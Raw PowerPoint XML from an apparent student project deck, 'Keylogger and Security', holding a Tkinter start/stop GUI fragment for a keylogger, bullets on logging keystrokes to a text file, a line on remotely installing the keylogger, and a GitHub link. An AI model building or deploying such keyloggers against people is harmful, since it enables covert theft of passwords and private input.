              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0" spc="15">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048597" name="object 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10951856" y="5979795"/>
            <a:ext cx="551167" cy="172085"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" rtlCol="0" tIns="6985" vert="horz" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="38100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="10" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr dirty="0" spc="10"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048598" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="4458113"/>
            <a:ext cx="6324600" cy="1295401"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" rtlCol="0" tIns="12700" vert="horz" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw algn="tl" blurRad="50800" dir="2700000" dist="38100" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>FINAL PROJECT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2800" lang="en-IN">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw algn="tl" blurRad="50800" dir="2700000" dist="38100" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr dirty="0" sz="28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3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="990600"/>
            <a:ext cx="10681335" cy="3077766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="95000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>(side=LEFT)</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>, state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN" err="1"/>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0" sz="2000" lang="en-IN"/>
            </a:br>
            <a:endParaRPr dirty="0" sz="2000" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097157" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467600" y="3695472"/>
            <a:ext cx="2392887" cy="26291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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="10681335" cy="69378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40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67" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2553315" y="2758767"/>
            <a:ext cx="6334126" cy="2462213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just" indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2600" lang="en-US"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2600" lang="en-US" err="1"/>
              <a:t>secuetre</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2600" lang="en-US"/>
              <a:t> accounts in a system or computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2600" lang="en-US"/>
              <a:t>In this solution the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2600" lang="en-US" err="1"/>
              <a:t>muose</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2600" lang="en-US"/>
              <a:t> and keyboard control and it store in a txt file what we type on keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="3200" lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="3200" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104866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10962893" y="98869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6" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619587" y="230506"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4194305" name="Content Placeholder 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1684081" y="1371600"/>
          <a:ext cx="7981156" cy="483325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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666875" y="531177"/>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85" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2439687"/>
            <a:ext cx="6396191" cy="2225040"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just" indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-IN"/>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86" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1219200" y="76200"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>PROJECT LINK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048687" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3785240" y="3244334"/>
            <a:ext cx="6705600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>https://github.com/MopuriLeelaSai/Project-Keylogger.git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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7443849" y="0"/>
            <a:ext cx="4752975" cy="6863080"/>
            <a:chOff x="7443849" y="0"/>
            <a:chExt cx="4752975" cy="6863080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104859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2" name="object 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911586" y="835745"/>
            <a:ext cx="5800851"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1048613" name="Subtitle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466725" y="3039171"/>
            <a:ext cx="9286875" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="4400" lang="en-US"/>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="4400" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048614" name="object 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10951856" y="5979795"/>
            <a:ext cx="551167"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7443849"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6" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10687050" y="6134100"/>
            <a:ext cx="247650" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048635" name="object 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-111062" y="657075"/>
            <a:ext cx="10018713"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6" name="object 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10951856" y="5976351"/>
            <a:ext cx="551167"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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4194304" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="223837" y="2049815"/>
          <a:ext cx="9657556" cy="348636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475021" y="3193025"/>
            <a:ext cx="2762250" cy="3257550"/>
            <a:chOff x="7991475" y="2933700"/>
            <a:chExt cx="2762250" cy="3257550"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104863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9" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="143446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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4916" y="611587"/>
            <a:ext cx="10018713"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1" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230152" y="1758313"/>
            <a:ext cx="6940869" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="95833" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just" indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>hacker then analyzes the keystrokes to locate usernames and passwords and uses them to hack into otherwise </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>secure systems</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2400" lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>To tackle this issue we are therefore using a software keylogger that can be remotely ins</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="2400" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048642" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10951856" y="5976351"/>
            <a:ext cx="551167"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4" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2924174" y="4452192"/>
            <a:ext cx="3552826" cy="1567608"/>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3" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="725271"/>
            <a:ext cx="10018713"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44" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="1892100"/>
            <a:ext cx="6791325" cy="3960283"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="91667" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US"/>
              <a:t>First we install the python ide and then we install the two packages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US"/>
              <a:t>First one is pip </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US"/>
              <a:t> install.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US"/>
              <a:t>Next one is johns library.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US"/>
              <a:t>Then these two are used for controlling mouse and keyboard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2400" lang="en-US"/>
              <a:t>So we can use for keylogger security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr b="1" dirty="0" sz="2400" lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr b="1" dirty="0" sz="2400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" marL="342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
